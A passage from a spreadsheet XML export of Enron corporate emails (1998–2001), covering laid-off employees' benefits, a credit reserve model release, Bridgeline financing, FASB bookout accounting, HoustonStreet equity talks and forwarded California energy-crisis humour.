I passed on the phone numbers for Towers Perrin and other numbers that they=_x000D_
 need to get their money from the Cash Balance Plan or to find out more abo=_x000D_
ut the COBRA benefits, etc. but there is a major stumbling block in their w=_x000D_
ay right now.  They keep being told that no one can do anything for them, n=_x000D_
ot even send them the necessary forms to get the ball rolling on these bene=_x000D_
fits, because Enron has not changed their status from active to terminated =_x000D_
(or inactive).  How can it possibly take a month to get this status changed=_x000D_
?  Please realize that a lot of these people have nothing:  no paycheck com=_x000D_
ing in, no unemployment checks YET, no retirement, no cash balance money, n=_x000D_
o medical benefits....they are feeling scared and panicked....PLEASE lets d=_x000D_
o something to help them.  I have no clue what all it takes to get 4,500+ e=_x000D_
mployees status changed but surely it cannot take a month to accomplish thi=_x000D_
s.  Whomever is in charge of getting this done, are we sure they have a sen=_x000D_
se of urgency about the situation?  People could lose their homes, cars, et=_x000D_
c. while they are waiting on all this red tape....this is very important._x000D_
_x000D_
Please advise._x000D_
_x000D_
Sabra Dinari</t>
  </si>
  <si>
    <t>Tue, 22 Dec 1998 01:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Christmas Eve Eve</t>
  </si>
  <si>
    <t>Let me check with Mr. B.  I don't think we have any specific plans - probably _x000D_
last minute shopping/wrapping.  We're both leaving on Thurs. and returning on _x000D_
Sun.</t>
  </si>
  <si>
    <t>Fri, 3 Mar 2000 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.le@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'vincent.tang@enron.com', 'tanya.tamarchenko@enron.com', 'xiaojun.mei@enron.com', 'ganapathy.ramesh@enron.com', 'wenyao.jia@enron.com', 'debbie.brackett@enron.com', 'rudi.zipter@enron.com'})</t>
  </si>
  <si>
    <t>The light at the end of tunnel!</t>
  </si>
  <si>
    <t>Hi All,_x000D_
_x000D_
After all the hard work, we are at time of harvesting!  But as we all know _x000D_
that there still a few more hurdles ahead of us in order to release credit _x000D_
reserve model at end of March,  but on the bright side, Vince Kaminski has _x000D_
promised us a big feast after we push the product out of door.  So let commit _x000D_
our self to do one last dash to the finish line!_x000D_
_x000D_
Here I composed a list of task that we need to accomplish for the release,  _x000D_
Let hit the items on the list and get it over with_x000D_
_x000D_
Continue the comparison test between old and new model   Winston_x000D_
Testing of theoretical deals!  finish the comparison between the theoretical _x000D_
value and model valuation!  Tanya T. Winston J._x000D_
Making the default probability table a configurable component and runtime _x000D_
parameter.  Winston J., Ramesh G._x000D_
Simulation dimension change for different analysis requirement, default path _x000D_
5000 max and price path 1000 max.  Winston_x000D_
Interface to run the credit reserve in GRMS system ( for now )   Ramesh_x000D_
Run time option, Applying stress scenario on input curves for any or all _x000D_
curves (sensitivity analysis)   Winston_x000D_
Runtime option, Curve replacement for any or all curves ( attribution _x000D_
analysis )    Winston_x000D_
Validation of different insurance plan       Tanya, Winston_x000D_
Intra-month position validation to see the impact of excluding of _x000D_
intra-manoth position on credit reserve  Vicent Tang, Ramesh_x000D_
Exchange deals handling( are they using the highest e-rating ? )   Ramesh_x000D_
Saving credit reserve result, please grant Winston and Xiaojun the privilege _x000D_
to save the result into production database,  Ramesh, Winston, XiaoJun_x000D_
credit reserve on legal id, based on the data clean up of all spreadsheets ( _x000D_
not scheduled )!_x000D_
Deployment plan.  One credit instance at any time until we get out new _x000D_
computing server ( probably in April time frame )_x000D_
_x000D_
_x000D_
This list may be an ever changing list and may also incomplete, please let me _x000D_
know if I missed anything or any deletions and additions!  Please let me know _x000D_
if anything I can clarify._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Jonathan</t>
  </si>
  <si>
    <t>Sun, 3 Jun 2001 17:08:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'greg_priest@smartforce.com'})</t>
  </si>
  <si>
    <t>Request for Contact Name and Phone Number</t>
  </si>
  <si>
    <t xml:space="preserve">Ken--_x000D_
_x000D_
Following up on my previous email, would you ask your assistant to revert_x000D_
to me by email with the name and contact information for the person that_x000D_
you think it would be best for us to contact regarding your e-Learning_x000D_
initiatives internally at Enron?  Thanks._x000D_
_x000D_
Regards,_x000D_
_x000D_
Greg_x000D_
_x000D_
----- Forwarded by Greg Priest/RWC/AMR/SmartForce on 06/03/01 05:25 PM_x000D_
-----_x000D_
_x000D_
                    Greg Priest_x000D_
                                         To:     kenneth.lay@enron.com_x000D_
                    05/21/01             cc:_x000D_
                    10:10 AM             Subject:     Follow up from our meeting_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ken--_x000D_
_x000D_
I just wanted to thank you again for inviting me to Houston, and more_x000D_
importantly, for the support you and Enron are providing to Technology for_x000D_
All and the joint TFA/SmartForce project.  I believe that we are going to_x000D_
help make a real difference._x000D_
_x000D_
I also wanted to follow up our brief conversation, where we discussed_x000D_
getting some of our people together with your people at Enron (I believe_x000D_
that you indicated that your head of HR would be a good start) to see_x000D_
whether there are ways in which SmartForce can help Enron achieve some of_x000D_
its business objectives around learning and training._x000D_
_x000D_
I would appreciate it if you would have someone email to me the contact_x000D_
information for whomever it would be appropriate for us to approach.  I'll_x000D_
take care of the rest from my end.  Thanks again._x000D_
_x000D_
Regards,_x000D_
_x000D_
Greg_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 07:43:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'georganne.hodges@enron.com'})</t>
  </si>
  <si>
    <t>To all:_x000D_
_x000D_
As of today, Bridgeline has $14MM of cash and expects to get $15MM from the payment of Oct receivables by the end of the month.  They have fully drawn down the $35MM revolver that we put in place earlier this year.  Trevor Mihalik (Bridgeline CFO) is preparing a cashflow forecast for Bridgeline from now to the end of the year and next year._x000D_
_x000D_
Bridgeline's major cash needs are to fund working capital (payables and margin calls) and to purchase gas that must be used to dewater the storage cavern (Enron #1) that we contributed to the partnership.  The dewatering process is now underway and will be completed mid-March 2002.  At a gas price of $2.50 and, working gas volume of 6 bcf, the total cash need for working gas will be approx. $15MM._x000D_
_x000D_
We are working with Bridgeline to find other sources of financing for the working gas that would enable them to make (and accelerate) the 2001 cash distribution to the partners.  Alternatives we are considering to fund the working gas: (i) increase the revolver from $35MM to $70MM,  (ii) find third parties (Enron ?) to enter into park-and-lend arrangements that would give Bridgeline the physical gas they need to dewater the facility without having to pay cash for it.   Most options will require Chevron/Texaco approval, which may come at a price._x000D_
_x000D_
I will distribute the cash flow statement when I receive it and Jean and I will meet with Randy and Trevor next week to discuss alternative financing/park-and-lend arrangements.   I have been cloaking my questions on the need for cash under the guise of putting together the 2002 plan (budget, headcount, capital needs, insurance requirements, etc.).  We should adhere to this commercial context so that we don't provide leverage to Bridgeline and Chevron/Texaco in any commercial discussions.  I will admit, however, given the headlines, it does not take a genius to figure out we need cash._x000D_
_x000D_
Regards,_x000D_
Brian_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Friday, October 26, 2001 8:46 AM_x000D_
To:	Hodges, Georganne_x000D_
Cc:	Colwell, Wes; Redmond, Brian_x000D_
Subject:	RE: Bridgeline Cash and AR_x000D_
_x000D_
Brian Redmond is working this_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hodges, Georganne  _x000D_
Sent:	Thursday, October 25, 2001 5:06 PM_x000D_
To:	Kitchen, Louise_x000D_
Cc:	Colwell, Wes_x000D_
Subject:	FW: Bridgeline Cash and AR_x000D_
Importance:	High_x000D_
_x000D_
I am not sure when we received our last cash distribution from Bridgeline but will check.  Should we pursue?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Gruesen, Karen  _x000D_
Sent:	Thursday, October 25, 2001 5:03 PM_x000D_
To:	Hodges, Georganne_x000D_
Subject:	FW: Bridgeline Cash and AR_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Schwarzbach, Emily  _x000D_
Sent:	Thursday, October 25, 2001 4:41 PM_x000D_
To:	Gruesen, Karen_x000D_
Subject:	Bridgeline Cash and AR_x000D_
_x000D_
Karen,_x000D_
_x000D_
The following are the Bridgeline account balances as of 9/30/01 that you requested:_x000D_
_x000D_
Cash - $34,374,000_x000D_
_x000D_
AR - $88,224,562_x000D_
_x000D_
If you have any further questions or need additional information please let me know._x000D_
_x000D_
Thank you._x000D_
_x000D_
Emily</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 09:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hemu@dynegy.com', 'rosteen@powersrc.com', 'martyjo.rogers@axiaenergy.com', 'babak.pooya@southernenergy.com', 'elizabeth.sager@enron.com', 'dperlman@powersrc.com', 'wfhenze@jonesday.com', 'jcrespo@hess.com', 'drusso@reliantenergy.com'})</t>
  </si>
  <si>
    <t>Bookouts</t>
  </si>
  <si>
    <t>EEI has been participating in discussion with FASB concerning the application _x000D_
of SFAS 133 and 138 to utility power purchase agreements where power is _x000D_
obtained to serve load obligations, as opposed to power marketing.  EEI's _x000D_
position is that such contracts should be treated under the  normal purchase _x000D_
and normal sale contracts exception under SFAS 138, for which derivatives _x000D_
accounting treatment would not apply.   Occaisonally a utility may agree to _x000D_
bookout certain transactions.  EEI's position is that a bookout is not a net _x000D_
settlement of the underlying purchase and sale contract because every party _x000D_
must fulfill each and every contractual transaction.  EEI also has maintains _x000D_
that even if there is a bookout title passes under the terms of the _x000D_
underlying contract.  See attached letter to FASB._x000D_
_x000D_
FASB has asked for additional information on the bookout issue.  In _x000D_
particular, it wants more information on the passing of title between _x000D_
entities in a bookout chain; what are the legal requirements for title to _x000D_
pass to another entity in a bookout chain?_x000D_
_x000D_
FASB also wants to know whether under bookouts are cash payments always _x000D_
settled gross with each company paying the total contract price for the _x000D_
purchase involved and receiving the total contract price for its sale or are _x000D_
there exceptions in normal practice?  I assume settlment in gross does not _x000D_
occur in the case of a buyer and seller in the chain whose underlying _x000D_
contract(s) provide for payment and/or transaction netting._x000D_
_x000D_
The close of the comment period is on Friday, so we are trying to get a _x000D_
letter back to FASB asap.   I would appreciate it if anyone in our group _x000D_
could comment on the questions FASB asks and/or the letter we previously sent _x000D_
to FASB.  Thanks in advance._x000D_
_x000D_
Andrew S. Katz, Director Industry Legal Affairs_x000D_
Edison Electric Institute_x000D_
701 Pennsylvania Avenue, N.W._x000D_
Washington, D.C.  20004_x000D_
Voice:  202-508-5616_x000D_
Fax:     202-508-5673_x000D_
e-mail:  akatz@eei.org_x000D_
 - TEXT.htm_x000D_
 - FASB 133 Bookouts.pdf_x000D_
 - Andy Katz.vcf</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2000 04:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brenda_harmon@mudnebr.com'})</t>
  </si>
  <si>
    <t>Re: Karen Merrill</t>
  </si>
  <si>
    <t>Girl, so now you see!  Karen just has issues!  So how are you doing?  I was _x000D_
on vacation on Friday and didn't get a chance to respond until today._x000D_
_x000D_
We were in Chicago this weekend for my husband's family reunion.  The weather _x000D_
was great compared to Texas.  Texas is so hot!!  How's Christian doing?  My _x000D_
boys are doing pretty good, just growing so fast._x000D_
_x000D_
Tell me more about Karen whenever you get a chance._x000D_
_x000D_
See ya!</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 04:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Name Overlays 0131</t>
  </si>
  <si>
    <t xml:space="preserve">I apoligize for not getting this out sooner.  I have been experiencing _x000D_
problems with Lotus Notes.  Attached please find the summary and details for _x000D_
name overlays changed in GCP on Jan. 31, and today, Feb. 1.  The short name _x000D_
changes will be made Fri., Feb 2._x000D_
_x000D_
Records on the Jan. 2000 Notification Report will be inactivated this _x000D_
afternoon with one noted exception._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 04:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Disney</t>
  </si>
  <si>
    <t>Find anything good?  I love you._x000D_
_x000D_
D</t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 01:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CES</t>
  </si>
  <si>
    <t>I just sold CES 515 dth in Mrkt area 12.  We can use IT to flow this gas - _x000D_
deal 154200._x000D_
_x000D_
We also sold CES 5000 dth at BG&amp;E, I am entering this deal as a Transco _x000D_
sale.  However, we may move it to CGAS.  I'll keep you posted.</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 05:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: energy humor</t>
  </si>
  <si>
    <t>----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/05/2001 06:01 PM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;mpalmer@enron.com&gt;, &lt;rshapiro@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: FW: energy humor_x000D_
_x000D_
_x000D_
Apparently I forgot to attach the material referred to in this morning's=20_x000D_
email. ?My dumb mistake -- daniel----------From: Daniel Casse=20_x000D_
&lt;dcasse@whwg.com&gt;Date: Fri, 05 Jan 2001 08:19:00 -0600To: &lt;skean@enron.com&gt;_x000D_
Cc: &lt;rshapiro@enron.com&gt;, &lt;mpalmer@enron.com&gt;Subject: energy humorSteve --=_x000D_
=20_x000D_
here is a first crack at some humor based on this week's news from=20_x000D_
California.At the end is an idea for a cartoon. ?I thought I should run it =_x000D_
by=20_x000D_
you before we get our cartoonist working on it.I'm in New York today and=20_x000D_
probably will check my email late in the day. ?But I will be checking my=20_x000D_
voicemail regularly.Daniel-- Daniel CasseWhite House Writers=20_x000D_
Group615-297-5999615-297-5908 (fax)_x000D_
 - EnergyHumorJan5.DOC_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/10/2001 01:27 AM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;rshapiro@enron.com&gt;, &lt;mpalmer@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: jan 9 enron humor_x000D_
_x000D_
_x000D_
Steve --_x000D_
_x000D_
here is another installment on the continuing California story.  There is_x000D_
another cartoon idea here.  I am ready to get our cartoonist rolling, but_x000D_
let me know if you like this or the previous idea._x000D_
_x000D_
_x000D_
_x000D_
--_x000D_
Daniel Casse_x000D_
White House Writers Group_x000D_
615-297-5999_x000D_
615-297-5908 (fax)_x000D_
_x000D_
_x000D_
_x000D_
 - Jan9humor.DOC_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/12/2001 11:26 AM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: FW: Energy crisis material_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
here are a few more items_x000D_
_x000D_
_x000D_
--_x000D_
Daniel Casse_x000D_
White House Writers Group_x000D_
615-297-5999_x000D_
615-297-5908 (fax)_x000D_
_x000D_
_x000D_
 - Jan12humor.DOC_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/16/2001 03:27 PM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;rshapiro@enron.com&gt;, &lt;mpalmer@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Jan 16 humor_x000D_
_x000D_
_x000D_
Attached is some more humor based on California events_x000D_
_x000D_
_x000D_
--_x000D_
Daniel Casse_x000D_
White House Writers Group_x000D_
615-297-5999_x000D_
615-297-5908 (fax)_x000D_
_x000D_
_x000D_
 - January16humor.DOC_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/23/2001 01:56 PM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;mpalmer@enron.com&gt;, &lt;rshapiro@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: California Humor_x000D_
_x000D_
Observations on the California Electricity Crisis_x000D_
White House Writers Group_x000D_
January 23, 2001_x000D_
_x000D_
Will the last business to leave California please turn out the lights._x000D_
Oh wait, they?re already out._x000D_
_x000D_
California Governor Gray Davis may ultimately prove responsible for the=20_x000D_
dimming of more lights than Frank Sinatra music._x000D_
_x000D_
California has done for energy deregulation what Florida has done for=20_x000D_
elections._x000D_
_x000D_
California Governor Gray Davis says he?ll appoint a "power plant czar" to=_x000D_
=20_x000D_
help solve the state?s energy crisis.  There must be a sign on his desk=20_x000D_
saying, "The buck stops here=06?just long enough for me to pass it to someo=_x000D_
ne=20_x000D_
else."_x000D_
_x000D_
During the current energy crisis in California, the spotlight shines on=20_x000D_
Governor Gray Davis=06?so long as it?s not knocked out by rolling blackouts=_x000D_
,=20_x000D_
that is._x000D_
_x000D_
Gray Davis was shocked when told about the "doomsday scenario."  Not the on=_x000D_
e=20_x000D_
from Pacific Gas &amp; Electric which envisions California power blackouts=20_x000D_
lasting 12 hours a day, the one from his aides saying he might lose the=20_x000D_
governor?s race in 2002._x000D_
_x000D_
California politicians have learned what thieves have known for a longtime.=_x000D_
 =20_x000D_
It?s easier to pick someone?s pocket in the dark._x000D_
_x000D_
California is talking conservation.  One good conservation measure would be=_x000D_
=20_x000D_
for Governor Gray Davis to save his breath trying to convince people that=_x000D_
=20_x000D_
government control is the answer to the energy crisis._x000D_
_x000D_
_x000D_
Possible Jingle Themes for Gray Davis Re-election Bid:_x000D_
_x000D_
My Hopes Were High 'til the Lights Went Low_x000D_
_x000D_
Brother, Can You Spare a Megawatt?_x000D_
_x000D_
There's Dark at the End of the Tunnel_x000D_
_x000D_
Return Me to Power (Even if You Don't Have Any)_x000D_
_x000D_
_x000D_
Top 10 Reasons to Not Have California Government Electricity_x000D_
_x000D_
10:  Would create yet another oxymoron._x000D_
_x000D_
9:  Electricity might go to wrong address the way mail does._x000D_
_x000D_
8:  Promise of efficient electricity gives politicians one more thing to li=_x000D_
e=20_x000D_
about._x000D_
_x000D_
7:  Power keeps going off when Rush Limbaugh comes on air._x000D_
_x000D_
6:  Light bulbs would match politicians for dimness._x000D_
_x000D_
5:  Special tax on flashlights._x000D_
_x000D_
4:  Fifteen day waiting period to use microwave._x000D_
_x000D_
3:  Rolling blackouts joined by rolling the taxpayers._x000D_
_x000D_
2:  Consumer manual on government-mandated way to change a light bulb runs=_x000D_
=20_x000D_
25,000 pages._x000D_
_x000D_
1:  Nine words: From the same people who gave you the DMV._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/31/2001 09:39 AM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;mpalmer@enron.com&gt;, &lt;rshapiro@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: California Energy Crisi Humor_x000D_
_x000D_
Observations on the California Energy Crisis_x000D_
The White House Writers Group_x000D_
January 31st_x000D_
_x000D_
_x000D_
_x000D_
Gray Davis has announced that he will soon announce two energy czars to lea=_x000D_
d=20_x000D_
the state through the current crisis.  Logical candidates include: Laurel a=_x000D_
nd=20_x000D_
Hardy, Abbott and Costello, Beavis and Butthead, and Siegfried and Roy._x000D_
_x000D_
The environmentalist Green Party is well-named.  Thanks to its role in=20_x000D_
blocking construction of new power plants, Californians are forking over=20_x000D_
plenty of green for energy._x000D_
_x000D_
California?s power industry is very Kennedyesque.  Their message to consume=_x000D_
rs=20_x000D_
is, "Ask not what your energy company can do for you; ask what you can do f=_x000D_
or=20_x000D_
your energy company."_x000D_
_x000D_
Congress might get involved in California?s energy crisis.  There?s nothing=_x000D_
 a=20_x000D_
drowning victim needs more than having an anchor thrown to him._x000D_
_x000D_
It?s one thing for California politicians trying to solve the energy proble=_x000D_
m=20_x000D_
to go back to the drawing board, but do they have to ask taxpayers to buy=_x000D_
=20_x000D_
them a new one?_x000D_
_x000D_
In California, lawmakers are now getting down to details.  The latest debat=_x000D_
e=20_x000D_
involves what to name the bonds the state will issue to help bail out the=_x000D_
=20_x000D_
utilities.  Proposals on the table include:  Blackout Bonds;Bailout Bonds;=_x000D_
=20_x000D_
Davis Debts; Blunder Bonds; Fiasco Funds._x000D_
_x000D_
###_x000D_
_x000D_
_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/31/2001 09:45 AM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;mpalmer@enron.com&gt;, &lt;rshapiro@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: carton_x000D_
_x000D_
_x000D_
Here is a cartoon you might like to pass on_x000D_
_x000D_
 - lightswitch.pdf_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/16/2001 01:31 PM -----_x000D_
_x000D_
=09Daniel Casse &lt;dcasse@whwg.com&gt;_x000D_
=0901/31/2001 09:47 AM_x000D_
=09=09=20_x000D_
=09=09 To: &lt;skean@enron.com&gt;, &lt;mpalmer@enron.com&gt;, &lt;rshapiro@enron.com&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: two cartoons_x000D_
_x000D_
_x000D_
either of these cartoons might work well with the news about the energy_x000D_
czars._x000D_
_x000D_
_x000D_
_x000D_
--_x000D_
Daniel Casse_x000D_
White House Writers Group_x000D_
615-297-5999_x000D_
615-297-5908 (fax)_x000D_
_x000D_
_x000D_
 - powercorrupts.pdf_x000D_
 - PleaseSir.pdf</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 05:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>fyi_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 10/30/2000 01:21 PM -----_x000D_
_x000D_
	David W Delainey_x000D_
	10/30/2000 01:12 PM_x000D_
		 _x000D_
		 To: Janet R Dietrich/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, Tim _x000D_
Belden/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Derek _x000D_
Davies/CAL/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Hunter S Shively/HOU/ECT@ECT, Laura _x000D_
Luce/Corp/Enron@Enron, Phillip K Allen/HOU/ECT@ECT, Michael L _x000D_
Miller/NA/Enron@Enron, Thomas A Martin/HOU/ECT@ECT, John _x000D_
Zufferli/CAL/ECT@ECT, Scott Tholan/Corp/Enron@Enron, W David _x000D_
Duran/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Rob Milnthorp/CAL/ECT@ECT, Max _x000D_
Yzaguirre/NA/Enron@ENRON, C John Thompson/Corp/Enron@ENRON, Scott _x000D_
Josey/Corp/Enron@ENRON, Paul Devries/TOR/ECT@ECT, Scott Neal/HOU/ECT@ECT, _x000D_
Jean Mrha/NA/Enron@Enron, David Oxley/HOU/ECT@ECT, Mark E _x000D_
Haedicke/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, _x000D_
Beth Perlman/HOU/ECT@ECT, Greg Wolfe/HOU/ECT@ECT, John Arnold/HOU/ECT@ECT, _x000D_
Wes Colwell/HOU/ECT@ECT, Fletcher J Sturm/HOU/ECT@ECT, Edward D _x000D_
Baughman/HOU/ECT@ECT, Mike Swerzbin/HOU/ECT@ECT, Bruce _x000D_
Sukaly/Corp/Enron@Enron, Doug Gilbert-Smith/Corp/Enron@ENRON, Eric _x000D_
LeDain/CAL/ECT@ECT, Brian Redmond/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, _x000D_
Rogers Herndon/HOU/ECT@ect, Jeffery Ader/HOU/ECT@ECT, Dana Davis/HOU/ECT@ECT, _x000D_
Fred Lagrasta/HOU/ECT@ECT, Jonathan McKay/CAL/ECT@ECT_x000D_
		 cc: Mark Frevert/NA/Enron@Enron, Kay Chapman/HOU/ECT@ECT, Dorie _x000D_
Hitchcock/HOU/ECT@ECT_x000D_
		 Subject: 2000 ENA Offsite_x000D_
_x000D_
Guys, attached you will find a preliminary agenda for the 2000 ENA Offsite.  _x000D_
As leaders of the organization, you have been invited to participate in a two _x000D_
day offsite where business 2001 objectives and strategies for ENA will be _x000D_
discussed.  It is scheduled to occur December 14th and 15th at the Venetian _x000D_
in Las Vegas._x000D_
_x000D_
This is the forum to ensure that your point of view and ideas can be heard _x000D_
and incorporated into our plans and iniatives as such I would encourage _x000D_
everyone to attend and to stay for the entire period.  In particular, we _x000D_
would like everyone to stay over Friday night and leave Saturday morning._x000D_
_x000D_
ENA public relations (Dorie) will manage all the logistics including air fare._x000D_
_x000D_
Final invitations, details and agenda will follow shortly._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Dave and John</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 13:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Follow-up on Friday's meeting</t>
  </si>
  <si>
    <t xml:space="preserve">It looks like we should send him the term sheet._x000D_
----- Forwarded by Mark Taylor/HOU/ECT on 05/16/2000 08:17 PM -----_x000D_
_x000D_
	"Frank Getman, HSE" &lt;fgetman@houstonstreet.com&gt;_x000D_
	05/16/2000 03:43 PM_x000D_
		 _x000D_
		 To: "'Louise.Kitchen@enron.com'" &lt;Louise.Kitchen@enron.com&gt;, "Frank Getman, _x000D_
HSE" &lt;fgetman@houstonstreet.com&gt;_x000D_
		 cc: "Frank Getman, HSE" &lt;fgetman@houstonstreet.com&gt;, mark.taylor@enron.com, _x000D_
dave.samuels@enron.com, Andy.Zipper@enron.com_x000D_
		 Subject: RE: Follow-up on Friday's meeting_x000D_
_x000D_
_x000D_
Louise,_x000D_
_x000D_
Sorry I forgot to answer your financials question.  We already have_x000D_
financial swaps for gas.  Financial electricity we can add very quickly with_x000D_
someone's design assistance.  We only need minimal help to validate product_x000D_
specification.  Functionality won't change._x000D_
_x000D_
I'm sorry if I was unclear on Europe/Japan.  I agreed that if you give us_x000D_
your numbers in those markets you would get 10%, but I need to know whether_x000D_
you are going to do that as part of this deal so I can complete other_x000D_
liquidity partner discussions accordingly.  It wasn't intended as an open_x000D_
option.  We can discuss Europe and Japan in the future, I'm just not sure I_x000D_
can guarantee you 10% at that time.  I've got my Board primed if we do it_x000D_
right now.  Perhaps we could agree that we will do it and you get your 10%_x000D_
in each entity now, but that the actual technology link doesn't start until_x000D_
later this year?_x000D_
_x000D_
Regards,_x000D_
Frank_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Louise.Kitchen@enron.com [mailto:Louise.Kitchen@enron.com]_x000D_
Sent: Tuesday, May 16, 2000 4:26 PM_x000D_
To: fgetman@houstonstreet.com_x000D_
Cc: Louise.Kitchen@enron.com; fgetman@houstonstreet.com;_x000D_
mark.taylor@enron.com; dave.samuels@enron.com; Andy.Zipper@enron.com_x000D_
Subject: RE: Follow-up on Friday's meeting_x000D_
_x000D_
_x000D_
_x000D_
I thought the European/Japan 10% was done ie if we put products we get 10%,_x000D_
ie an option we could decide on later._x000D_
_x000D_
Any idea also on the financial date as our guys do not think we can make_x000D_
any volume targets without it.  We are working on crude and products._x000D_
_x000D_
Also Mark please liaise with Frank on the documentation you require from_x000D_
him._x000D_
_x000D_
Thanks_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 (Embedded     Enron Capital &amp; Trade Resources Corp._x000D_
 image moved_x000D_
 to file:      From:  "Frank Getman, HSE"_x000D_
 pic03909.pcx) &lt;fgetman@houstonstreet.com&gt;_x000D_
               05/16/2000 02:51 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   "'Louise.Kitchen@enron.com'" &lt;Louise.Kitchen@enron.com&gt;_x000D_
cc:   "Frank Getman, HSE" &lt;fgetman@houstonstreet.com&gt;,_x000D_
      mark.taylor@enron.com, dave.samuels@enron.com, Andy.Zipper@enron.com_x000D_
_x000D_
Subject:  RE: Follow-up on Friday's meeting_x000D_
_x000D_
_x000D_
Louise,_x000D_
_x000D_
Thanks for your email.  Your list for power and gas products are fine. I_x000D_
agree we can add products/markets going forward as appropriate.  We also_x000D_
discussed posting your numbers for crude and products.  I believe we agreed_x000D_
crude and products would not be part of any volume targets, but that we_x000D_
would incorporate those products in the first round.  Please provide me a_x000D_
list for crude and products based on what we offer on HoustonStreet.  Also,_x000D_
any thoughts on whether you want to take me up on my offer to include your_x000D_
numbers in Europe (UK, Germany and Scandanavia) and Japan for an additional_x000D_
10% equity in each of those markets?  The reason I ask is that we are_x000D_
engaged in liquidity partner discussions right now and your answer might_x000D_
affect our decisions.  We are on target to go live in Europe this Summer._x000D_
_x000D_
As for corporate docs, we are prepared to deliver whatever you need to see_x000D_
whenever it is appropriate.  Just let me know when you would like them and_x000D_
I'll arrange to get them to the appropriate individual at Enron._x000D_
_x000D_
Regards,_x000D_
Frank_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
